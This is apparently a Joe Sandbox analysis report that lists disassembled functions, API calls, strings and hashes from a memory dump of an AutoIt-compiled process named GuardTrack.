Instruction ID: 8e14c917d123a0c14bd74e67b33615dfe13265462da1b56b0f2d2801e8ef8695
Opcode Fuzzy Hash: bf9a9f4315109cbc4428cafa0e0a97a83f10de277a4e070b644af36c691cd992
Instruction Fuzzy Hash: 1CD01794160A09F8E95A03248A0FFF6820BE3817C0F9C414A7103851C1E89058CA9421

Function 00609369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00608FA7), ref: 00609389

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 9f66d069d5b897b6283c373c25ff9a401e237b75e542fc9344e96b41ae870989
Instruction ID: 62e52c2f8bf5a1543e262526c0a5a17a631f39c6d97c1c97f949ff49f61eb813
Opcode Fuzzy Hash: 9f66d069d5b897b6283c373c25ff9a401e237b75e542fc9344e96b41ae870989
Instruction Fuzzy Hash: 53D05E3226051EABEF018EA4DC01EAE3B6AEB04B01F408111FE15C50A0C775D835AB60

Function 005F0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 005F0734

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: de490cc5b30a77cd212c0ff7c719319ab5a7ebd24fb564c0dd85bad4416a639f
Instruction ID: 189204782d5adbb0d91a44760c6366a092b4c8e3c11795b52e91907f391500df
Opcode Fuzzy Hash: de490cc5b30a77cd212c0ff7c719319ab5a7ebd24fb564c0dd85bad4416a639f
Instruction Fuzzy Hash: 61C04CF581011DDBDB15DBA0D988EFE7BBDBB04304F141455A205B2140D7789B448A71

Function 005DA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 005DA35A

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 95b9e50c68f9d2f811ad64dd57bf8f6f363c810bb6c2e8eeee2e67d3654ef24d
Instruction ID: 75475fdad5af00ca719e3bb1fe8c679686e4ed7aec53e9b7a6354e1bff44d82d
Opcode Fuzzy Hash: 95b9e50c68f9d2f811ad64dd57bf8f6f363c810bb6c2e8eeee2e67d3654ef24d
Instruction Fuzzy Hash: AEA0243003010CF7CF011F41FC044447F5DD7015507004010F50C00031CF33541045C0

Function 00627EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00627F45
DeleteObject.GDI32(00000000), ref: 00627F57
DestroyWindow.USER32 ref: 00627F65
GetDesktopWindow.USER32 ref: 00627F7F
GetWindowRect.USER32(00000000), ref: 00627F86
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006280C7
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006280D7
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0062811F
GetClientRect.USER32(00000000,?), ref: 0062812B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00628165
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00628187
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0062819A
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281A5
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281AE
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281BD
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281C6
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281CD
GlobalFree.KERNEL32(00000000), ref: 006281D8
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281EA
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00643C7C,00000000), ref: 00628200
GlobalFree.KERNEL32(00000000), ref: 00628210
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00628236
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00628255
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00628277
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00628464

Strings

, xrefs: 006283EA
static, xrefs: 0062815F, 006282B6
AutoIt v3, xrefs: 00628117
DISPLAY, xrefs: 006282C7

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: d9d76a1686ac398a08a2a39bc2ea062dbb1375320d7c2b625382469be4959ee7
Instruction ID: 501599dfd3894edbaf50ce9f2307956898decf2e8b581b19bc9f9564ad5f6ead
Opcode Fuzzy Hash: d9d76a1686ac398a08a2a39bc2ea062dbb1375320d7c2b625382469be4959ee7
Instruction Fuzzy Hash: D9027F75900525EFDB14DFA4DC89EAE7BBAFB49310F048158FA15AB2A1DB30AD41CF60

Function 00633BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00640980), ref: 00633C65
IsWindowVisible.USER32(?), ref: 00633C89

Strings

ISCHECKED, xrefs: 00633E77
DELSTRING, xrefs: 00633D87
GETCURRENTCOL, xrefs: 00633F66
GETSELECTED, xrefs: 00633EE1
UNCHECK, xrefs: 00633EC1
SENDCOMMANDID, xrefs: 00634018
ISVISIBLE, xrefs: 00633C75
FINDSTRING, xrefs: 00633DB4
CURRENTTAB, xrefs: 00633CFB
ADDSTRING, xrefs: 00633D54
SETCURRENTSELECTION, xrefs: 00633DF4
ISENABLED, xrefs: 00633CA9
TABRIGHT, xrefs: 00633CDB
GETCURRENTLINE, xrefs: 00633F2B
GETLINE, xrefs: 00633FD9
SELECTSTRING, xrefs: 00633E44
GETLINECOUNT, xrefs: 00633F04
GETCURRENTSELECTION, xrefs: 00633E21
CHECK, xrefs: 00633EAB
SHOWDROPDOWN, xrefs: 00633D1E
HIDEDROPDOWN, xrefs: 00633D3E
TABLEFT, xrefs: 00633CC5
EDITPASTE, xrefs: 00633F9D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: c104fa468ddb7b233800f9466f533573f91fdb8f28be10a5ad55fdfe6e8a5866
Instruction ID: bb93723f937371772fa554f793b35781172bb95c93634b28ad112a99af602182
Opcode Fuzzy Hash: c104fa468ddb7b233800f9466f533573f91fdb8f28be10a5ad55fdfe6e8a5866
Instruction Fuzzy Hash: BED191302046118FCB14EF14C455AAABBA7AF94354F10485EF9865B3E3CF31EE0ACB92

Function 0063ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0063AC55
GetSysColorBrush.USER32(0000000F), ref: 0063AC86
GetSysColor.USER32(0000000F), ref: 0063AC92
SetBkColor.GDI32(?,000000FF), ref: 0063ACAC
SelectObject.GDI32(?,?), ref: 0063ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 0063ACE6
GetSysColor.USER32(00000010), ref: 0063ACEE
CreateSolidBrush.GDI32(00000000), ref: 0063ACF5
FrameRect.USER32(?,?,00000000), ref: 0063AD04
DeleteObject.GDI32(00000000), ref: 0063AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 0063AD56
FillRect.USER32(?,?,?), ref: 0063AD88
GetWindowLongW.USER32(?,000000F0), ref: 0063ADB3

Part of subcall function 0063AF18: GetSysColor.USER32(00000012), ref: 0063AF51
Part of subcall function 0063AF18: SetTextColor.GDI32(?,?), ref: 0063AF55
Part of subcall function 0063AF18: GetSysColorBrush.USER32(0000000F), ref: 0063AF6B
Part of subcall function 0063AF18: GetSysColor.USER32(0000000F), ref: 0063AF76
Part of subcall function 0063AF18: GetSysColor.USER32(00000011), ref: 0063AF93
Part of subcall function 0063AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0063AFA1
Part of subcall function 0063AF18: SelectObject.GDI32(?,00000000), ref: 0063AFB2
Part of subcall function 0063AF18: SetBkColor.GDI32(?,00000000), ref: 0063AFBB
Part of subcall function 0063AF18: SelectObject.GDI32(?,?), ref: 0063AFC8
Part of subcall function 0063AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0063AFE7
Part of subcall function 0063AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0063AFFE
Part of subcall function 0063AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0063B013

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: f28c99442add4979d8ee5c820de1bf5243bd3f3f670a73183709c79b28253583
Instruction ID: b3544e31b11e1afb5b40764e5d3964bc42015681563e318885595032515b13f0
Opcode Fuzzy Hash: f28c99442add4979d8ee5c820de1bf5243bd3f3f670a73183709c79b28253583
Instruction Fuzzy Hash: 55A19275008311AFE7159FA4DD08AAB7BAAFF49321F101A1DFA92961E0C731D840DF92

Function 005B2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 005B3072
DeleteObject.GDI32(00000000), ref: 005B30B8
DeleteObject.GDI32(00000000), ref: 005B30C3
DestroyIcon.USER32(00000000,?,?,?), ref: 005B30CE
DestroyWindow.USER32(00000000,?,?,?), ref: 005B30D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 005EC77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 005EC7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 005ECBDE

Part of subcall function 005B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005B2412,?,00000000,?,?,?,?,005B1AA7,00000000,?), ref: 005B1F76

SendMessageW.USER32(?,00001053), ref: 005ECC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 005ECC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 005ECC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 005ECC53

Strings

0, xrefs: 005ECA72

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: d11f26aae8e493cbb1bf9c2b443af5ee3322ab4e18657b5447f29a69e6bf09f0
Instruction ID: d53dad80f5d96d69bf397d32c19fe92c1d3623f58197896a55d31653e4b6e15d
Opcode Fuzzy Hash: d11f26aae8e493cbb1bf9c2b443af5ee3322ab4e18657b5447f29a69e6bf09f0
Instruction Fuzzy Hash: DF12BC30604295EFDB28DF25C888BA9BFA5FF49300F144569F999DB262C731EC42CB91

Function 005C27FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 005D0FE6: std::exception::exception.LIBCMT ref: 005D101C
Part of subcall function 005D0FE6: __CxxThrowException@8.LIBCMT ref: 005D1031

__wcsnicmp.LIBCMT ref: 005C286A
__wcsnicmp.LIBCMT ref: 005C287E
__wcsnicmp.LIBCMT ref: 005C2896
__wcsnicmp.LIBCMT ref: 005C28AE
__wcsnicmp.LIBCMT ref: 005C28C6
__wcsnicmp.LIBCMT ref: 005C28DE
__wcsnicmp.LIBCMT ref: 005C28F6
__wcsnicmp.LIBCMT ref: 005C290A
__wcsnicmp.LIBCMT ref: 005C2948
__wcsnicmp.LIBCMT ref: 005C295C
__wcsnicmp.LIBCMT ref: 005C2970
__wcsnicmp.LIBCMT ref: 005C2984

Strings

", xrefs: 005FFB89
#ce, xrefs: 005C297E
#include-once, xrefs: 005C28C0
Unterminated group of comments, xrefs: 005FFCFA
#comments-end, xrefs: 005C296A
#pragma compile, xrefs: 005C2864
Bad directive syntax error, xrefs: 005FFBD3, 005FFBF0
#notrayicon, xrefs: 005C2878
', xrefs: 005FFB9F
#comments-start, xrefs: 005C28F0, 005C2942
#OnAutoItStartRegister, xrefs: 005C28A8
#requireadmin, xrefs: 005C2890
#cs, xrefs: 005C2904, 005C2956
#include, xrefs: 005C28D8
Cannot parse #include, xrefs: 005FFCE5

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 4b202d6111b3df0989160b37ee257adc176f61dc54dcc8fd328a94c6212d9dfa
Instruction ID: 115e4063341f0dc398aefb84648deaebe452efe44bd3b7b1a1a3fac94dd70213
Opcode Fuzzy Hash: 4b202d6111b3df0989160b37ee257adc176f61dc54dcc8fd328a94c6212d9dfa
Instruction Fuzzy Hash: B1A19030A4020AAFCB24AFA5DC56FBE3F65BF85740F14002EF905AB292DBB19E41D751

Function 00627B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00627BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00627C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00627CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00627CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00627D1D
GetClientRect.USER32(00000000,?), ref: 00627D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00627D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00627D7C
GetStockObject.GDI32(00000011), ref: 00627D8C
SelectObject.GDI32(00000000,00000000), ref: 00627D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00627DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00627DA9
DeleteDC.GDI32(00000000), ref: 00627DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00627DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00627DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00627E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00627E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00627E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00627E85
GetStockObject.GDI32(00000011), ref: 00627E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00627E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00627EA5

Strings

static, xrefs: 00627D67, 00627E7F
AutoIt v3, xrefs: 00627D15
msctls_progress32, xrefs: 00627E26
DISPLAY, xrefs: 00627D72

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 23a21742cbd550850c9e732903d60629f73aed92fba4abd5f13fde5191569d4e
Instruction ID: f2cbc2cf86ef0857bec9f74c8f0e7a7ac47600bed73593a9e0b57247e18b350b
Opcode Fuzzy Hash: 23a21742cbd550850c9e732903d60629f73aed92fba4abd5f13fde5191569d4e
Instruction Fuzzy Hash: FBA170B5A00619BFEB14DBA4DC4AFAE7BBAEB45710F004114FA25A72E1D770AD40CF64

Function 0061B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0061B361
GetDriveTypeW.KERNEL32(?,00642C4C,?,\\.\,00640980), ref: 0061B43E
SetErrorMode.KERNEL32(00000000,00642C4C,?,\\.\,00640980), ref: 0061B59C

Strings

RAID, xrefs: 0061B53A
1394, xrefs: 0061B51E
SSA, xrefs: 0061B525
SAS, xrefs: 0061B548
Unknown, xrefs: 0061B45E, 0061B502
Fibre, xrefs: 0061B52C
Network, xrefs: 0061B47C
ATAPI, xrefs: 0061B510
FileBackedVirtual, xrefs: 0061B56B
SCSI, xrefs: 0061B509
SATA, xrefs: 0061B54F
Removable, xrefs: 0061B490
Fixed, xrefs: 0061B486
PhysicalDrive, xrefs: 0061B3EA
USB, xrefs: 0061B533
CDROM, xrefs: 0061B472
MMC, xrefs: 0061B55D
\\.\, xrefs: 0061B3B3
iSCSI, xrefs: 0061B541
SSD, xrefs: 0061B4C9
Virtual, xrefs: 0061B564
RAMDisk, xrefs: 0061B468
ATA, xrefs: 0061B517

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 3441ca837a223da01b7f6fbc2e2c207d3b4e23543e99f1e306ed0dca2ffc09e1
Instruction ID: faa6ec878746a0e17d8f7397936716ba1bcfdb199de6fa57f96c70ab23fe8e20
Opcode Fuzzy Hash: 3441ca837a223da01b7f6fbc2e2c207d3b4e23543e99f1e306ed0dca2ffc09e1
Instruction Fuzzy Hash: 8E517534B40209EB8B04DF60C946AFD7BE3AB89740B6DE015F406E7291D7B1AEC2DB55

Function 0063A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0063A0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0063A1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 0063A1CC

Strings

0, xrefs: 0063A209

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: e1472718a2d814f2fe5da3da7e821403b9a8f1fe42265eea3c5b32b6820a783b
Instruction ID: 11b49424c51ec2c8590ac3c2a7672452971e9f0919a61aeedf67e0e7f0aa59e2
Opcode Fuzzy Hash: e1472718a2d814f2fe5da3da7e821403b9a8f1fe42265eea3c5b32b6820a783b
Instruction Fuzzy Hash: F602DC30108301AFE715CF54C849BAABBE6FF86314F08861DF9DA963A1C775D941EB92

Function 0063AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0063AF51
SetTextColor.GDI32(?,?), ref: 0063AF55
GetSysColorBrush.USER32(0000000F), ref: 0063AF6B
GetSysColor.USER32(0000000F), ref: 0063AF76
CreateSolidBrush.GDI32(?), ref: 0063AF7B
GetSysColor.USER32(00000011), ref: 0063AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0063AFA1
SelectObject.GDI32(?,00000000), ref: 0063AFB2
SetBkColor.GDI32(?,00000000), ref: 0063AFBB
SelectObject.GDI32(?,?), ref: 0063AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 0063AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0063AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 0063B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0063B05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0063B086
InflateRect.USER32(?,000000FD,000000FD), ref: 0063B0A4
DrawFocusRect.USER32(?,?), ref: 0063B0AF
GetSysColor.USER32(00000011), ref: 0063B0BD
SetTextColor.GDI32(?,00000000), ref: 0063B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0063B0D9
SelectObject.GDI32(?,0063AC1F), ref: 0063B0F0
DeleteObject.GDI32(?), ref: 0063B0FB
SelectObject.GDI32(?,?), ref: 0063B101
DeleteObject.GDI32(?), ref: 0063B106
SetTextColor.GDI32(?,?), ref: 0063B10C
SetBkColor.GDI32(?,?), ref: 0063B116

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

